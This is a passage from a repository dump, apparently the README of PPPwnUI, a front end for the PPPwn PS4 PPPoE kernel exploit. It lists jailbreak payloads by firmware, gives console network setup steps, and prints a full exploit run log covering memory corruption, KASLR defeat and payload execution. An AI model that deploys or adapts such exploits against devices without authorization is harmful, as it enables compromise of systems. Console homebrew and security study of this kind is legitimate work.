Version you want to use ([PPPwn Python](https://github.com/TheOfficialFloW/PPPwn), [PPPwn_Go](https://github.com/BestPig/PPPwn_go)) 41 | 42 | - Choose your Payload Between : 43 | 44 | - **PPPwn** : (Available for : 7.00, 7.01, 7.02, 7.50, 7.51, 7.55, 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60, 10.00, 10.01, 10.50, 10.70, 10.71 & 11.00) 45 | 46 | - **PPPwn Goldhen** Payloads : (Available for : 9.00, 9.60, 10.00, 10.01 & 11.00) 47 | 48 | - **VTX HEN** : (Available for : 7.55, 8.00, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 10.00, 10.01 10.50, 10.70, 10.71 & 11.00) 49 | 50 | - **PPPwn Linux Payloads** : (Available for : 11.00) 51 | 52 | - **Custom Payloads** : (Your own custom Payloads) 53 | 54 | 55 | - Then click on **Start PPPwn** to start the Exploit. 56 | 57 | 58 | ## PPPwn Usage : 59 | 60 | On your PS4: 61 | 62 | - Go to `Settings` and then `Network` 63 | - Select `Set Up Internet connection` and choose `Use a LAN Cable` 64 | - Choose `Custom` setup and choose `PPPoE` for `IP Address Settings` 65 | - Enter anything for `PPPoE User ID` and `PPPoE Pasword` 66 | - Choose `Automatic` for `DNS Settings` and `MTU Settings` 67 | - Choose `Do Not Use` for `Proxy Server` 68 | - Click `Test Internet Connection` to communicate with your computer 69 | 70 | If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on `Test Internet Connection`. If the script fail or is stuck waiting for a request/response, abort it and run it again on your computer, and then click on `Test Internet Connection` on your PS4. 71 | 72 | ## Goldhen Usage : 73 | 74 | On your Computer: 75 | 76 | - Copy `goldhen.bin` to the root directory of an exfat/fat32 USB and insert it into your PS4. 77 | 78 | ## Example run : 79 | 80 | ```sh 81 | [+] PPPwn - PlayStation 4 PPPoE RCE by theflow 82 | [+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin 83 | [+] Using PPPwnUI By Memz ! 84 | 85 | [+] STAGE 0: Initialization 86 | [*] Waiting for PADI... 87 | [+] pppoe_softc: 0xffffabd634beba00 88 | [+] Target MAC: xx:xx:xx:xx:xx:xx 89 | [+] Source MAC: 07:ba:be:34:d6:ab 90 | [+] AC cookie length: 0x4e0 91 | [*] Sending PADO... 92 | [*] Waiting for PADR... 93 | [*] Sending PADS... 94 | [*] Waiting for LCP configure request... 95 | [*] Sending LCP configure ACK... 96 | [*] Sending LCP configure request... 97 | [*] Waiting for LCP configure ACK... 98 | [*] Waiting for IPCP configure request... 99 | [*] Sending IPCP configure NAK... 100 | [*] Waiting for IPCP configure request... 101 | [*] Sending IPCP configure ACK... 102 | [*] Sending IPCP configure request... 103 | [*] Waiting for IPCP configure ACK... 104 | [*] Waiting for interface to be ready... 105 | [+] Target IPv6: fe80::2d9:d1ff:febc:83e4 106 | [+] Heap grooming...done 107 | 108 | [+] STAGE 1: Memory corruption 109 | [+] Pinning to CPU 0...done 110 | [*] Sending malicious LCP configure request... 111 | [*] Waiting for LCP configure request... 112 | [*] Sending LCP configure ACK... 113 | [*] Sending LCP configure request... 114 | [*] Waiting for LCP configure ACK... 115 | [*] Waiting for IPCP configure request... 116 | [*] Sending IPCP configure NAK... 117 | [*] Waiting for IPCP configure request... 118 | [*] Sending IPCP configure ACK... 119 | [*] Sending IPCP configure request... 120 | [*] Waiting for IPCP configure ACK... 121 | [+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141 122 | 123 | [+] STAGE 2: KASLR defeat 124 | [*] Defeating KASLR... 125 | [+] pppoe_softc_list: 0xffffffff884de578 126 | [+] kaslr_offset: 0x3ffc000 127 | 128 | [+] STAGE 3: Remote code execution 129 | [*] Sending LCP terminate request... 130 | [*] Waiting for PADI... 131 | [+] pppoe_softc: 0xffffabd634beba00 132 | [+] Target MAC: xx:xx:xx:xx:xx:xx 133 | [+] Source MAC: 97:df:ea:86:ff:ff 134 | [+] AC cookie length: 0x511 135 | [*] Sending PADO... 136 | [*] Waiting for PADR... 137 | [*] Sending PADS... 138 | [*] Triggering code execution... 139 | [*] Waiting for stage1 to resume... 140 | [*] Sending PADT... 141 | [*] Waiting for PADI... 142 | [+] pppoe_softc: 0xffffabd634be9200 143 | [+] Target MAC: xx:xx:xx:xx:xx:xx 144 | [+] AC cookie length: 0x0 145 | [*] Sending PADO... 146 | [*] Waiting for PADR... 147 | [*] Sending PADS... 148 | [*] Waiting for LCP configure request... 149 | [*] Sending LCP configure ACK... 150 | [*] Sending LCP configure request... 151 | [*] Waiting for LCP configure ACK... 152 | [*] Waiting for IPCP configure request... 153 | [*] Sending IPCP configure NAK... 154 | [*] Waiting for IPCP configure request... 155 | [*] Sending IPCP configure ACK... 156 | [*] Sending IPCP configure request... 157 | [*] Waiting for IPCP configure ACK... 158 | 159 | [+] STAGE 4: Arbitrary payload execution 160 | [*] Sending stage2 payload... 161 | [+] Done! 162 | ``` 163 | 164 | ## To do : 165 | 166 | - Rebuild PPPwn_CPP to use Interface Name and not ID 167 | - Auto Updater 168 | 169 | This Program was originally made with ❤️ by [Memz](https://github.com/B-Dem) for [Sighya](https://sighya.fr). 170 | 171 | If you find this program helpful, leave a star on the repo! 172 | 173 | And if you got any feedback, open an issues ! 174 | -------------------------------------------------------------------------------- /USB Drive (GoldHEN_v2.4b17.3)/goldhen.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/USB Drive (GoldHEN_v2.4b17.3)/goldhen.bin -------------------------------------------------------------------------------- /media/logo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/media/logo.ico -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | scapy 2 | psutil --------------------------------------------------------------------------------